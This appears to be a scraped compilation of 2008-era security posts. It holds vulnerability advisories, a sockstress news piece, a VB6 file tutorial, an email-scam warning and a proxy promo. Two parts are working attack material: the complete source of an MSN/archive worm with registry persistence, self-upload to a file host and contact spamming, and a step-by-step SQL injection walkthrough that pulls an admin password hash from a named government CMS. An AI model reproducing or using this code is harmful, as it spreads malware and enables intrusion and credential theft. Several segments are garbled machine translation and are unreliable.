A Java based HTTP/HTTPS proxy for assessing web application vulnerability. It supports editing/viewing HTTP messages on-the-fly. Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc. Download , Windows Installer
ref. parosproxy
Barracuda Networks Spam Firewall is vulnerable to various SQL Injection attacks.
When exploited by an authenticated user, the identified vulnerability can lead to
Denial of Service, Database Information Disclosure, etc.
CVE Number: CVE-2008-1094
Vulnerability: SQL Injection
Risk: Medium
Attack vector: From Remote
Vulnerability Discovered: 16th June 2008
Vendor Notified: 16th June 2008
Advisory Released: 15th December 2008
Description
The index.cgi resource was identified as being susceptible to SQL Injection attacks.
When filtering user accounts in Users->Account View section, the pattern_x parameter
(where x = 0..n) allows inserting arbitrary SQL code once filter_x parameter is set
to search_count_equals‘ value.
/cgi-bin/index.cgi?&user=&password=&et=&auth_type=Local&locale=en_US&realm=&primary_tab=USERS&secondary_tab=per_user_account_view&boolean_0=boolean_and&filter_0=search_count_equals&pattern_0=if(database() like concat(char(99),char(37)),5,0)
An attacker can exploit this vulnerability by injecting arbitrary SQL code to be
executed as part of the SQL query.
Original Advisory:
http://dcsl.ul.ie/advisories/02.htm
Barracuda Networks Technical Alert
http://www.barracudanetworks.com/ns/support/tech_alert.php
Affected Versions
Barracuda Spam Firewall (Firmware v3.5.11.020, Model 600)
Other products/versions might be affected.
Mitigation
Vendor recommends to the following firmware version
Barracuda Spam Firewall (Firmware v3.5.12.001)
Alternatively, please contact Barracuda Networks for technical support.
Credits
Dr. Marian Ventuneac, marian.ventuneac@ul.ie
Data Communication Security Laboratory, Department of Electronic & Computer Engineering, University of Limerick
Disclaimer
Data Communication Security Laboratory releases this information with the vendor acceptance.
DCSL is not responsible for any malicious application of the information presented in this advisory.
ref. milw0rm.com
Following PCMAV or Software Anti nation child masterpiece virus
( Magazine PC Media) edition December 2008 or PCMAV version of 1.9.
Virus-Virus which is on edition before all still,
hopefully dgn this new edition can be dissipated. "
there is no antivirus other capable to overcome with complete of
computer virus, foreign and local good, which disseminating many in Indonesia as good as
ref and download
SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass
Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- - Written: 10.11.2008
- - Public: 20.11.2008
SecurityReason Research
SecurityAlert Id: 57
CWE: CWE-264
SecurityRisk: Medium
Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/57
Vendor: http://www.php.net
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl
with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web
developers to write dynamically generated pages quickly.
error_log
They allow you to define your own error handling rules, as well as modify the way the errors can
be logged. This allows you to change and enhance error reporting to suit your needs.
- --- 0. error_log const. bypassed by php_admin_flag ---
The main problem is between using safe_mode in global mode
php.ini:
safe_mode = On
and declaring via php_admin_flag
...
php_admin_flag safe_mode On
When we create some php script in /www/ and try call to:
ini_set("error_log", "/hack/");
or in /www/.htaccess
php_value error_log "/hack/bleh.php"
Result:
Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0
Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4
It was for safe_mode declared in php.ini. But if we use
php_admin_flag safe_mode On
in httpd.conf, we will get only
Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4
syntax in .htaccess
php_value error_log "/hack/blehx.php"
is allowed and bypass safe_mode.
example exploit:
error_log("", 0);
- --- 2. How to fix ---
Fixed in CVS
http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup
Note:
Do not use safe_mode as a main safety.
--- 3. Greets ---
sp3x Infospec schain p_e_a pi3
- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
# milw0rm.com [2008-11-20]
A basic MSN Messanger & ZIP/RAR Archive & MSN shares worm.. Don't try to spread it!
Written in VB.Net due to synge complaining that there isnt enough VB.Net malware lol
source code:
Imports MessengerAPI
Imports System.Diagnostics
Imports System.Reflection
Imports Microsoft.Win32
Imports System.IO
Imports System.Net
Imports System.Text
'A basic MSN Messanger & ZIP/RAR Archive & MSN shares worm.. Don't try to spread it!
'Written in VB.Net due to synge complaining that there isnt enough VB.Net malware lol
'''''''''''''''''''''''''''''''''
' Genetix {Doomriderz} '
' W32/Nurofen.worm '
' XMAS 2006 '
'''''''''''''''''''''''''''''''''
'1: adds to registry run key to start with windows "c:\MSNUpdate.exe".
'2: waits for msn to load by checking processes for "msnmsgr" then waits and checks to see if it's signed in and appear as online.
'3: uploads a copy of itself to the filesever with a random file name
'4: get's a random topic & gets all online contacts
'5: sends the random topic with the url to the worm download & url to DotNet framework 2.0 :p
'6: checks if the WinRar.exe exists by checking for the path in the registry
'7: searches for rar & zip files in it's folder and drops a copy of itself inside them
'8: Find MSN shared folders and copy as "Game.exe" to them.
'9: Kinda harmless payload that hides every file on the drive (attr +H)
'My worm will work depending on the follwoing reasons:
'1: The file server used dont change how it handles uploads
'2: You dont change the code and mess it all up!
'3: you have .net 2.0
'4: you have internet access
'4: its bug free (i think it is but report any bugs to me genetix [AT] phreaker [Dot] net
'5: If it dont work for people trying to spread it then I dont care! I hope it fails on you.
Public Class Form1
Private Const MAX_PATH As Integer = 260
'declare some API's / variables... ect that will be used globaly in this worm
Private Declare Auto Function GetShortPathName Lib "kernel32" ( _
ByVal lpszLongPath As String, _
ByVal lpszShortPath As System.Text.StringBuilder, _
ByVal cchBuffer As Integer) As Integer
Const DotNet As String = "http://MSDOTNET.notlong.com" 'short url to .net 2.0
Dim RarPath As String
Dim WormPath As String
Dim WormFile As String
Dim msn As New Messenger()
Dim Victims As IMessengerContacts
Dim Victim As IMessengerContact
Dim Worm As String
Dim url As String
Const KeyTitle As String = "MSNUpdate"
Const subkey As String = "Software\Microsoft\Windows\CurrentVersion\Run"
'This sub deals with calling other needed sub's/functions and is the main body
'of the contacts spreading.
Sub MSN_Worm()
On Error Resume Next
upload()
File.Delete(Worm)
Dim message(15) As String
Randomize()
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'some lame messages to fool the user into getting this worm.. '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
message(1) = "New msn block checker 1.5 Download here: " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(2) = "MSN Block checker download " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(3) = "Working MSN block checker " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(4) = "Free MSN Add-ons limited! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(5) = "New MSN messanger 2007 " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(6) = "Find out who's blocked you! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(7) = "Download the new MSN block checker! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(8) = "Download the new MSN smilie kit! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(9) = "NEW MSN BLOCK CHECKER DOWNLOAD NOW! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(10) = "Download the new MSN bot it talks like a real person!! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(11) = "New MSN tool get it now! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(12) = "Download our new MSN block checker " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(13) = "Find out who is blocking you on MSN " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(14) = "This program can get your friends MSN passwords!! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
message(15) = "Find out your friends MSN passwords! " & url & _
" you will need to install the .net framework to run this application, here: " & DotNet
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'okay so now it searches for online contacts and and opens a '
'a chat window to send its download link then closes the window.. '
'all done kinda reall fast '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Victims = msn.MyContacts
For Each Victim In Victims
If Victim.Status <> MISTATUS.MISTATUS_OFFLINE Then
If Victim.Blocked <> True Then
msn.InstantMessage(Victim.SigninName)
SendKeys.SendWait(message(Int(15 * Rnd()) + 1))
SendKeys.SendWait("{ENTER}")
SendKeys.SendWait("{ESC}")
End If
End If
Next
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'call sub to get WinRar from registry then check if it exist '
'if so, call the rar worm function (also for .zip) '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
RarPath = GetRarPath()
If File.Exists(RarPath) = True Then
RarWorm()
End If
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'call MSN shares spreading sub '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
MSN_Share_drop()
Randomize()
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'to check if payload should activate via random number comparing '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
If Int(200 * Rnd()) = 50 Then
payload()
End If
End Sub
Private Sub Timer_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer.Tick
On Error Resume Next
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'The worm need's to know when MSN starts/When its online/If its '
'already running ect.. this this timer deals with all that stuff '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Dim FindProcess As Process
For Each FindProcess In Process.GetProcesses(System.Environment.MachineName)
If (FindProcess.ToString().IndexOf("msnmsgr", 0) + 1) Then
If msn.MyStatus = MISTATUS.MISTATUS_ONLINE Then
Timer.Enabled = False
MSN_Worm()
End If
End If
Next FindProcess
End Sub
Sub upload()
On Error Resume Next
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Thx you retro soooo much~! most of this sub is all his code but i rewrote it in VB.net for this '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'Well this is very kewl! it uploads itself to the file server and gets the link to download it
'thats all but It's good!
Dim pos As Integer
Dim pos2 As Integer
Dim sKey As String
Dim key As String
Dim boundary As String = Guid.NewGuid().ToString().Replace("-", "")
Dim fs As FileStream = File.OpenRead(Worm)
Dim bytes As Byte() = New Byte(fs.Length - 1) {}
fs.Read(bytes, 0, bytes.Length)
fs.Close()
Dim mimebody As String = "--" & _
boundary & Constants.vbCrLf & _
"Content-Disposition: form-data; name=""MAX_FILE_SIZE""" & _
Constants.vbCrLf & Constants.vbCrLf & "27000000" & Constants.vbCrLf & _
"--" & boundary & Constants.vbCrLf & _
"Content-Disposition: form-data; name=""page""" & _
Constants.vbCrLf & Constants.vbCrLf & "upload" & Constants.vbCrLf & _
"--" & boundary & Constants.vbCrLf & _
"Content-Disposition: form-data; name=""file""; filename=""" & _
Worm & """" & Constants.vbCrLf & "Content-Type: application/x-msdos-program" _
& Constants.vbCrLf & Constants.vbCrLf & Encoding.Default.GetString(bytes) & _
Constants.vbCrLf & "--" & boundary & "--" & Constants.vbCrLf
Dim buffer As Byte() = Encoding.Default.GetBytes(mimebody)
Dim request As HttpWebRequest = CType(WebRequest.Create("http://www5.upload2.net/upload.php"), HttpWebRequest)
request.Method = "POST"
request.ContentType = "multipart/form-data; charset=UTF-8; boundary=" & boundary
request.Accept = "text/xml,application/xml,application/xhtml+xml, " _
+ "text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
request.Headers.Add("Accept-Encoding", "gzip,deflate")
request.Headers.Add("Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7")
request.ContentLength = buffer.Length
ServicePointManager.Expect100Continue = False
request.CookieContainer = New CookieContainer()
Dim srvStream As Stream = request.GetRequestStream()
srvStream.Write(buffer, 0, buffer.Length)
srvStream.Close()
Dim response As HttpWebResponse = CType(request.GetResponse(), HttpWebResponse)
Dim respURL As String = response.ResponseUri.ToString()
'I love playing with strings!
pos = (respURL.IndexOf("/id/", 0) + 1)
sKey = Mid(respURL, pos + 4, Len(respURL))
pos2 = (sKey.IndexOf("/pwd/", 0) + 1)
key = sKey.Substring(0, pos2 - 1)
url = "http://www.upload2.net/page/download/" + key + "/" + Worm + ".html"
End Sub
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'Worm needs to know the current drive its on so this deals with it. '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Function CurDrive(ByVal arg As String)
On Error Resume Next
Dim dir As String, Pos As String
Pos = (arg.IndexOf("\", 0) + 1)
dir = arg.Substring(0, Val(Pos))
CurDrive = dir
End Function
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'payload that calls on other functions to get what it needs. '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Sub payload()
On Error Resume Next
Dim MyDir As DirectoryInfo
MyDir = New DirectoryInfo(WormPath)
GetDirs(MyDir)
End Sub
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'this kinda just installs the worm.. explains itself (like most of my code) '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
On Error Resume Next
Me.Visible = False
Dim WormModule As System.Reflection.Module = [Assembly].GetExecutingAssembly().GetModules()(0)
WormFile = (WormModule.FullyQualifiedName)
WormPath = (CurDrive(WormFile))
Dim NewValue As String = WormPath & "\WINDOWS\" & KeyTitle & ".exe"
If File.Exists(NewValue) = False Then
File.Copy(WormFile, NewValue)
End If
Worm = RndFileName() & ".exe"
If File.Exists(Worm) = False Then
File.Copy(WormFile, Worm)
End If
Dim key As RegistryKey = Registry.CurrentUser.OpenSubKey(subkey, True)
key.SetValue(KeyTitle, NewValue)
End Sub
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'this is part of a recursive folder searching function '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Sub GetDirs(ByVal aDir As DirectoryInfo)
On Error Resume Next
Dim nextDir As DirectoryInfo
GetFiles(aDir)
For Each nextDir In aDir.GetDirectories
GetDirs(nextDir)
Next
End Sub
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'same as above but for files.. they reply on eachother to work.. '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Sub GetFiles(ByVal aDir As DirectoryInfo)
On Error Resume Next
Dim aFile As FileInfo
For Each aFile In aDir.GetFiles()
File.SetAttributes(aFile.FullName, FileAttributes.Hidden)
Next
End Sub
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'well i decided its better not to use a static name for uploading '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Function RndFileName()
On Error Resume Next
Dim builder As New StringBuilder()
Dim random As New Random()
Dim cha As Char
Dim i As Integer
For i = 0 To 6
cha = Convert.ToChar(Convert.ToInt32((26 * random.NextDouble() + 65)))
builder.Append(cha)
Next
RndFileName = builder.ToString()
End Function
''''''''''''''''''''''''''''''''''''''''
'this sub is for zip/rar archive worm '
''''''''''''''''''''''''''''''''''''''''
Sub RarWorm()
On Error Resume Next
Dim WormModule As System.Reflection.Module = [Assembly].GetExecutingAssembly().GetModules()(0)
Dim WormFile As String = (WormModule.Name)
Dim FullName As String = (WormModule.FullyQualifiedName)
Dim WormPath As String = (WorkingFolder(FullName))
Dim i As Int32 = 0
Dim files() As String
Dim compile As String = ""
Dim ShrtPath As String = ""
Dim shrtWorm As String = 0
Dim ext As String = ""
files = System.IO.Directory.GetFiles(WormPath)
For i = 0 To files.GetUpperBound(0)
ext = Mid(files(i), Len(files(i)) - 3, Len(files(i)))
If ext = ".rar" Or ext = ".zip" Then
ShrtPath = GetShortFileName(files(i))
compile = RarPath & " a " & ShrtPath & Space(1) & WormFile
Shell(compile, AppWinStyle.Hide, True)
End If
Next
End Sub
'''''''''''''''''''''''''''''''''''
'here is the MSN shares worm sub '
'''''''''''''''''''''''''''''''''''
Sub MSN_Share_drop()
On Error Resume Next
Dim WormModule As System.Reflection.Module = [Assembly].GetExecutingAssembly().GetModules()(0)
Dim WormFile As String = (WormModule.FullyQualifiedName)
Dim FolPath As String = WormPath & "Documents and Settings\" & Environ("USERNAME") & "\Local Settings\Application Data\Microsoft\Messenger\"
If Dir(FolPath, FileAttribute.Directory) <> "" Then
Dim i As Int32 = 0
Dim x As Int32 = 0
Dim shares() As String
shares = System.IO.Directory.GetDirectories(FolPath)
For i = 0 To shares.GetUpperBound(0)
If Dir(shares(i), FileAttribute.Directory) <> "" Then
If File.Exists(shares(i) & "\Game.exe") = False Then
File.Copy(WormFile, shares(i) & "\Game.exe")
End If
End If
Next
End If
End Sub
''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'the worm needs to know if and where WinRar is right? '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Function GetRarPath() As String
On Error Resume Next
Dim myReg As RegistryKey
myReg = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\WinRAR.exe", False)
If Not myReg Is Nothing Then
GetRarPath = CStr(myReg.GetValue("Path")) & "\WinRar.exe"
End If
End Function
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'Long path wont work with WinRar.exe because of the spaces so this function deals with it '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Public Function GetShortFileName(ByVal LongPath As String) As String
On Error Resume Next
Dim ShortPath As New StringBuilder(MAX_PATH)
Dim BufferSize As Integer = GetShortPathName( _
LongPath, _
ShortPath, _
ShortPath.Capacity)
Return ShortPath.ToString()
End Function
'''''''''''''''''''''''''
'get current directory '
'''''''''''''''''''''''''
Function WorkingFolder(ByVal arg As String)
On Error Resume Next
Dim dir As String, Pos As String
Pos = InStrRev(arg, "\")
dir = Mid(arg, 1, Val(Pos))
WorkingFolder = dir
End Function
End Class
'Ok its messy! But I'm proud of it.
url: http://www.hummingbird.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net
This source was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Info:
DeployRun.dll <= 10.0.0.44
Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
Vulnerable source method:
Sub SetRegistryValueAsString (ByVal Path As String, ByVal v As String)
Tested on Windows XP Professional SP3 full patched, with Internet Explorer 7
There are a lot of dangerous methods, just take a look and... good searching
source :
ref. milw0rm.com
regards,
Portal Name: Dorsa CMS
Vendor : http://www.dorsacms.com
Description : A CMS written by iranian programmers which uses by governmental websites.
Vulnerable File : ShowPage.aspx
Dork: Powered by DorsaCms
Author : syst3m_f4ult && Y!ID : autumn_love6
How to exploit :
a live example :
http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2
Testing injection :
http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,@@version)--
Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise ...
Getting table which contains Username and Password:
Easiest way is to search it:
http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 table_name from information_schema.columns where column_name like %27%pass%%27))--
table_name = Seller
Its not that table we are seeking, so we keep on:
http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 table_name from information_schema.columns where column_name like %27%pass%%27 and table_name not in ('Seller')))--
Bingo
Table_name = USER_
Start to get username and pass from USER_:
http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 %2b'Username= '%2bconvert(varchar,isnull(convert(varchar,user_name),'NULL'))%2b' -- Password= : '%2bconvert(varchar,isnull(convert(varchar,Pass),'NULL')) from USER_ where Code='1'))
user : admin
pass : kaBY/8jRC+XbjSIIDhsHFmOX1B2pDd
Update hash to a hash you know its decode and enjoy.
login to portal :
http://www.xxx.ir/Dorsapax/Signin.aspx
ref. milw0rm.com
regards,
Hacking Firefox source ( Deface all web which you visit) this title is taken let looked to be cool and very underground. If you wish defacing site with a purpose to so that seen cool your friends eye and don't wish to enter the prison because impinging UU ITE because your action, hence I will show its way of source. Again I emphasize this just for joke. Follow every stepnya and do, if you go out of each step which I inform the you have to responsible it self, and truely I will not hold responsible if happened something your. Usage of this information fully responsibility from your.
This technique only can be done with browser firefox constructively addon greasemonkey. Thus soon download firefox browser and grasemonkey. Link it in searching alone yes in uncle G source. Then Install Firefox if not yet owned it and say cheerio to IE ( sometime I still pake IE to hard appearance desain web which again in making). If firefox have diinstall his moment menginstall greasemonkey. Then kill browser firefox to be greasemonkey can active [moment you open browser firefox after him. If successful you installing greasemonkey icon be like this will appear in statusbar undercarriage.
Its moment we make script to greasemonkey - write to use your editor ( my use notepad++):
Source script :
Or you can direct download from here. deface.user.js ( 1.20 kb)
step hereinafter drag and drop the file to browser firefox you and depress install. To see do have active or not yet remained the right click icon greasemonkey and select;choose manage user script. See " Deface www site" active or don't.
After installation have try to open web site by using www ex. http://www.tomiyahya.web.id . how is him result ? ? Then demonstrate to your friend. Ha100X. sure him/her number site that have defaced.
Though ........... ...... ...... ....
This technique only just eye deceit. Web site be in fact don't terdaface only appearance in browser just you, become the peaceful you of gin UU ITE. To deface in fact didn't ask to me, I just kidding.
These guys are the inventors of UnicornScan, a user-land TCP stack turned into a port scanner. Never heard of it? Use Nmap exclusively? Well if you run Linux, I suggest checking out, especially if missed ports in your portscan is inexcusable. But I digress.
Robert and Jack are smart dudes. I've known them for years, and they've always been one step ahead of the game. A couple of years ago, Jack found some anomalies in which machines would stop working in some very specific circumstances while being scanned. A few experiments, tons of reading through documentation, and one mysteriously named tool called "sockstress" later, and the two are now touting a nearly universal denial-of-service (DoS) attack that can be performed on almost any normal broadband Internet connection -- in just a few seconds.
How bad is it? Well, in an interview --- (fast-forward five minutes in to hear it in English), the two were asked if they could take out a data center. While they've never tried, it appears to be a totally plausible attack. Worse yet, unlike most DoS attacks, the machines often do not come back online once the attack is over. The victim system just doesn’t respond any more
Great, huh?
Robert and I talk a lot, and I asked him if he'd be willing to DoS us, and he flatly said, "Unfortunately, it may affect other devices between here and there so it's not really a good idea." Got an idea of what we're talking about now? This appears not to be a single bug, but in fact at least five, and maybe as many as 30 different potential problems. They just haven't dug far enough into it to really know how bad it can get. The results range from complete shutdown of the vulnerable machine, to dropping legitimate traffic.
The two researchers have already contacted multiple vendors since the beginning of September (I've had a small hand in getting them in contact with one of the vendors). Robert and Jack are waiting with no specific timeline to hear back from the affected TCP stack vendors. Think firewalls, OSes, Web-enabled devices, and so on. Yup, they'll all need to be hardened, if the vendors can come up with a good solution to the problem. IPv6 services appear to be more affected by the fact that they require more resources and are no more secure since they still reside on top of an unhardened TCP stack.
Jack and Robert are both trying to be as forthcoming as possible with the affected vendors without giving any specific information on how the attack works to the public at large -- openly acknowledging how dangerous the attack really is. Their hope is that the vendors appreciate the problem and come up with fixes that may not be initially obvious to them. I asked Robert when they planned to release their tool, to which he said he wasn't sure he would "ever release sockstress." The details, however, will be forthcoming once vendor patches are available. There are no mitigating short-term fixes, folks.
I feel winter slowly coming, and it would be a shame if entire power grids could be taken offline with a few keystrokes, or if supply chains could be interrupted. I hear it gets awfully cold in Scandinavia.
The reader is expected to have read the first part of this tutorial which deals
with sequential files. You can still follow this tutorial without reading Part-I,
but I recommend reading the sequential files tutorial first because I may have mentioned certain things in Part-I which also apply to Binary Files.
As far as Visual Basic 6 is concerned, there are three modes in which a file can
be accessed.
1. Text Mode (Sequential Mode)
2. Binary Mode
3. Random Access Mode
In the Text Mode, data is ALWAYS written and retrieved as CHARACTERS.
Hence, any number written in this mode will result in the ASCII Value of the
number being stored.
For Example, The Number 17 is stored as two separate characters "1" and "7".
Which means that 17 is stored as [ 49 55 ] and not as [ 17 ].
In the Binary Mode, everything is written and retrieved as a Number.
Hence, The Number 17 Will be stored as [ 17 ] in this mode and
characters will be represented by their ASCII Value as always.
One major difference between Text Files and Binary Files is that Text Files
support Sequential Reading and Writing. This means that we cannot read or write
from a particular point in a file. The only way of doing this is to read through
all the other entries until you reach the point where you want to 'actually'
start reading.
Binary Mode allows us to write and read anywhere in the file. For example we can
read data directly from the 56th Byte of the file, instead of reading all the
bytes one by one till we reach the 56th byte.
Part-I dealt with Sequential Files, and this one will teach you how to read and
write files in Binary Mode.
You will often come across the terms "Text Files", "Sequential Files",
"Sequential Mode", "Binary Mode" and "Binary Files" while reading books,
articles or even posts on the internet related to file handling and wonder what
they really mean.
A file is a set of bytes/records stored together.
Text Files are files which contain only characters in ASCII or Unicode.
Sequential Files are files opened in Sequential Mode.
Sequential Mode refers to any of the modes used for sequential file handling
which are Input, Output and Append.
Binary Mode refers to the Binary Mode [which you shall learn about as you
progress through this tutorial]
Binary Files refer to files opened in Binary Mode.
You should note that Binary Files and Sequential Files are not different kinds
of files but rather different methods of accessing a file.
Any file can be opened in both sequential and binary modes (obviously not at the
same time wink2.gif ). If it is opened in sequential mode, you will only be able to
access data in the file sequentially. If it's opened in Binary mode, you can
access any byte in the file without reading the previous bytes in the file.
example :
1. Add a Command Button with name as Command1 onto a Form
2. Private Sub Command1_Click()
3. Dim f As Long
4. f = FreeFile()
5.
6. Open "c:\test.txt" For Binary As #f
7. Close #f
8. End Sub
view plainprint?
1. 'Add a Command Button with name as Command1 onto a Form
2. Private Sub Command1_Click()
3. Dim f As Long
4. f = FreeFile()
5.
6. Open "c:\test.txt" For Binary As #f
7. Close #f
8. End Sub
As you can see, the FreeFile() function can also be used for binary files.
The Open Statement opens c:\test.txt in Binary Mode and the next statement
closes the file.
As obvious as it may sound, you need to open a file before using it and close it
when you have finished reading or writing to it. Many programmers forget to add
the Close statement which results in the File Already Open Error, and it can be
a pain to track down the exact location that caused the error when you're
dealing with many files.
You should note that this snippet does more than open and close a file.
If the test.txt file is not present in C drive, then it creates a blank file
with the same name.
Computer Hackers nowadays offers different services - and the most widely offered is to crack into email passwords such as Yahoo, Hotmail, Gmail, AOL, Lycos and so on. Some are really good but most are just scams.
The most common and successful method is achieved with the use of keyloggers to record any email passwords and computer surveillance software. 100 percent sure, makers of this application often called it that way, not a "hacking program."
Recently, forums are flooded with different offers from so called email hackers. Are you sure they are really hackers and have success on the task you will be giving them?
Beware of Scams
Step-by-step Yahoo hacking!!! So many have been victimized by this, sending their passwords and hoping that they can retrieved a targeted account by following these:
It goes this way:
Log in to your own yahoo account. Compose an e-mail to: recoversecretcode@yahoo.com. The automated server will send you the password that you have 'forgotten', after receiving the information you send them. STEP 3- In the subject line type exactly: password retrieve...etc, etc...
Don't fall into this. It's a real scam. The only way to recover your password is going to your email account, check for" forgot="" password="" and="" will="" ask="" you="" for="" authentication="" before="" it="" resets="" your="">
In Yahoo for example, it will prompt for "secret questions" which you have filled during your sign-up. Thereafter the original passwords will be emailed to your alternate email account, which also you have provided during sign-up. It is very important to keep those "sign-up" information for your future use.
Scammers common trick is to ask users to send money before they start the process. Most of them are generating large amount of money with this, but no results or job is done in the end. You will end up a victim.
If there is a great need for you to retrieved someone's email password, there are some who can provide it for you, choose the best, someone who will send you proofs such as screenshots of inbox, sent items or address book before they ask for payment. Though, we never advise you to resort into this, it is still invading others privacy no matter how you accomplished it.
Ni info bagus dari temen,udah saya coba..ok banget.. ->
Bagi yg suka buka web/download file sering nemuin keadaan kyk gini :
1. Akses lama, koneksi lelet & timeout.
2. Hasil download sering error.
3. Frekuensi download dibatasi (kyk di rapidshare, dll).
4. IP kita dibanned / dilarang ngunjungi.
5. Takut alamat IP qt dicatat.
Dan kita berharap :
1. Koneksi lebih CEPAT (misalnya untuk akses https://) .
2 . Koneksi lebih AMAN (alamat IP qt 100% berubah, HIGH ANONYMITY).
3. Bisa download lebih banyak TANPA DIBATASI (mgkn bisa tak terbatas, tergantung settingan cookies).
4. Bisa mengunjungi website TANPA KHAWATIR dibanned lagi.
5. Surfing BEBAS gak perlu was-was lagi.
Semua tadi bisa didapatkan dengan pake tool online GRATIS
(GA PERLU DOWNLOAD/INSTALL utk pakenya) di:
http://freeproxy.co.cc
(jangan lupa utk bookmark!)
Cukup dengan memasukkan alamat web/URL yang pingin kita tuju trus klik Go!
Semua koneksi yang kita lakukan akan lebih cepat & aman.
Untuk cek IP anda bisa dengan mengunjungi website :
www.proxydetect.com & www.showip.net
Silahkan buka lakukan sebelum & sesudah menggunakan tool ini.
Nnti akan kelihatan perbedaan IP (alamat koneksi kita) yg kita pke.
Slain itu utk buka situs https jg lebih cepet.
Karena saat mngunjungi situs yg urlnya https,
tool ini tetep jln karena qt buka tool ini tanpa hrs ngrubah ke https pula.
Slain itu koneksi qt tetep aman krn komunikasi qt akn tetep dienskripsi!
Tool ini menggunakan script cgi (common gateway interface) dg cgiproxy
sbg enginenya. Yaitu merupakan script yg opensource & licence-nya
udh kedaftar ke GNU (www.gnu.org). Jadi, qt ga perlu takut / khawatir utk makenya.
